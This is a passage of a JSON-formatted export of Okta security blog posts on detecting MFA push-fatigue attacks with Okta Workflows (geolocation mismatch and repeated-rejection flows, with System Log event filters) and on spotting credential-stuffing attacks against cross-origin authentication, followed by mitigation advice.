\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/11/a-deep-dive-into-okta-fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/smart-card-authenticator.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Smart Cards\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next best solution - albeit a tactical one - is to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Number-Challenge-for-Okta-Verify?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"apply number challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to push requests.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your organization isn’t in a position to make these changes, we recommend introducing detections that identify suspicious push requests, as well as workflows for automating your response to suspicious events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security previously \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published logic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" used by our detection engineering team to identify malicious push requests. This detection, alongside others, has been added to the content libraries of security analytics tools like Splunk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/workflows-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", our no-code automation tool, offers opportunities to automate responses to suspicious requests in close to real-time, using the same underlying logic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this post, we’ll discuss two flows that evaluate the trustworthiness of a Verify Push request according to different criteria:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Variations in the geolocation metadata captured by the source of the request (the Okta SignIn Widget) and the response to the request (the Okta Verify app), and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple rejected push challenges by a user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflow 1: Detect Suspicious Push Challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Detect Suspicious Push Challenges” workflow\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" was developed for workforce customers using Okta Identity Engine.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The logic does not rely on user identification of a suspicious request. Instead, it determines whether the source of a Push Challenge (the “source event” generated by the Okta SignIn Widget) comes from a different location than the Okta Verify client that accepts or rejects the challenge (destination event):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Engine\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Source Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Destination Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"system.push.send_factor_verify_push\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND debugContext.debugData.factor eq \\\"OKTA_VERIFY_PUSH\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The geolocation information (country, state, city) in each event is found in the client.geographicalContext object.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This week, a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"basic version of this flopack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" was added to Okta’s extensive Workflows template library. The templated workflow checks if the two requests described above come from the same city. If the city does not match, a message with some of the relevant metadata is prepared for security operations teams.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a range of other orchestrated responses available for “flogrammers” to consider, which are discussed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflow 2: Detect Repeated User Rejections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our alternative workflow addresses the “fatigue” aspects of a push fatigue attack. Okta solution engineer Sean Hanrahan has \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_and_respond_to_mfa_fatigue_attacks\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"created versions for both Okta Identity Engine and Okta Classic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The logic works as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flow triggers on user rejection of a push MFA prompt (see table below)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flow stores data on sequential rejection events in tables\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user rejects a Push MFA request more than a configurable number of times (default: 5) in a configurable time threshold (default: 1 hour), a range of responses can be automated (see suggestions below the table).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The tables are purged at configurable intervals.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Engine\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Rejection Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND outcome.result=\\\"FAILURE\\\" and outcome.reason=\\\"INVALID_CREDENTIALS\\\" and debugContext.debugData.factor eq \\\"OKTA_VERIFY_PUSH\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.mfa.okta_verify.deny_push\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Orchestrated Responses\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both of these flows were designed to notify security operations analysts of suspicious activity in close to real-time. Okta Workflows comes with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/connector-reference.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"built-in connectors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for messaging tools like Slack and Teams, email clients like Gmail and Office 365 Mail, or IT service management tools such as ServiceNow, Jira Service Desk, freshservice, PagerDuty, ZenDesk and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workflows also offers opportunities to orchestrate differentiated responses based on the metadata observed in the events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"template\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for Workflow 1, for example, security operations teams are notified when the location of push source and push response do not include the same city (client.geographicalContext.city). This is a good place for analysts to start evaluating the benign reasons why location information doesn’t match. After this analysis, you may also want to take different actions based on whether there is a mismatch in city, state or country data, or other network related information captured by these events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With a little tuning, your workflow might end up something more like this:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the city matches, end the flow and take no action.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the state matches, but the events came from different cities, send a message to the SOC.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the events were in a different country, immediately revoke the session (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/clearusersessions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Clear User Session\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card) and notify the SOC.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Workflow can further be extended to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide the SOC analyst a direct link/shortcut to the events of interest in the Okta Admin Console (Under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Reports > System Log\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide the SOC analyst a history of how many times the user successfully authenticated from a given location in recent months (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/searchsystemlogs.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search System Logs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Place users into a “higher risk” group that subjects them to higher assurance requirements for access to critical applications (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/addnewusertogroup.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Add User to Group\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assess if the user successfully authenticated after repeated failure events (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/searchsystemlogs.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search System Logs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card), and in turn:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trigger a session revocation (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/clearusersessions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Clear User Session\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card) and/or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset the user’s potentially compromised password (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/resetpassword.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset Password\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card)\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next Steps\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you'd like to get started with Workflow 1 (“Detect Suspicious Push Challenges”):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Import the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"flopack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" into your Workflows console.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Follow the instructions in the readme doc provided at GitHub to configure an Event Hook that triggers the flow on Verify Push MFA events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Select a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/connector-reference.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"connector\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for which tool you want to use for SOC notifications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Start testing!\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you’re at the RSA Conference in San Francisco this week, the “Detect Suspicious Push Challenges” flow will be showcased at the Okta booth.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For access to a pre-built template for Workflow 2 (“Detect Repeated User Rejections”), please ask your Okta Customer Success Manager.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And if you’re just getting started with Workflows, we recommend this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/playlist?list=PLIid085fSVdvyK8F4xuk49EchBPmAVNHG\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"YouTube channel\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for lots of great tutorials.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Thanks to Harish Chakravarthy and Bryan Barrows for testing and documenting these flows.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T18:43:55.026Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"53f82036-02a9-5d61-bd70-4dc26074d4d1","bio":{"bio":"Sean Hanrahan is a Senior Solutions Engineer, helping some of Okta’s largest accounts to solve their identity and security challenges with Okta’s technology. Prior to joining Okta, Sean worked for VMware as a customer success architect, focused on device security, unified endpoint management, SASE, and Zero Trust.
"},"image":null,"name":"Sean Hanrahan","jobTitle":"Senior Solutions Engineer","slug":"sean-hanrahan","node_locale":"en"}]},{"slug":"/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks","id":"b49a7b51-bbc9-5896-aea2-07d49a960452","title":"Detecting Cross-Origin Authentication Credential Stuffing Attacks","date":"2024-05-28T16:38:31+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has determined that the cross-origin authentication feature in Customer Identity Cloud (CIC) is prone to being targeted by threat actors orchestrating credential-stuffing attacks. As part of our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and commitment to customer security, we routinely monitor and review potentially suspicious activity and proactively send notifications to customers. In this case, we have proactively notified the customers we identified that have this feature enabled, and provided additional guidance in a customer email.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For context, we observed that the endpoints used to support the cross-origin authentication feature being attacked via credential stuffing for a number of our customers. In this type of attack, adversaries attempt to sign-in to online services using large lists of usernames and passwords potentially obtained from previous data breaches or unrelated entities, or from phishing or malware campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This post will assist you with investigating credential-stuffing attacks, as well as provide guidance in the “Recommended Actions” below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Period\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed suspicious activity that started on April 15. Please note that this may not be continuous for every tenant, we recommend reviewing suspicious activity from that date forward.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Events to Review:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"fcoa - Failed cross-origin authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"scoa - Successful cross-origin authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"pwd_leak - Someone attempted to login with a leaked password\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommended Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Review tenant logs for unexpected fcoa, scoa, and pwd_leak events. Refer to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/deploy-monitor/logs/log-event-type-codes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Event Type Codes\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for more information.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your tenant does not use cross-origin authentication, but `scoa` or fcoa events are present in event logs, then it is likely your tenant has been targeted in a credential stuffing attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your tenant does use cross-origin authentication and either saw a spike of `scoa` events in April or an increase in the ratio of failure-to-success events (fcoa/scoa), then it is likely your tenant has been targeted in a credential stuffing attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user password was compromised in a credential stuffing attack, the user’s credentials should be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/database-connections/password-change\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"rotated immediately\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" out of an abundance of caution.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protecting your Tenant from Credential Stuffing Activity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below are our recommendations on how to best protect your users from credential-stuffing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Longer-term solution:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enroll users in passwordless, phishing resistant authentication. We recommend the use of passkeys as the most secure option. Passkeys are included on all Auth0 plans from our free plan through Enterprise.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Medium-term mitigations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent users from choosing weak passwords. Require a minimum of 12 characters and no parts of the user name. Block passwords found in the Common Password List. This can be done in the 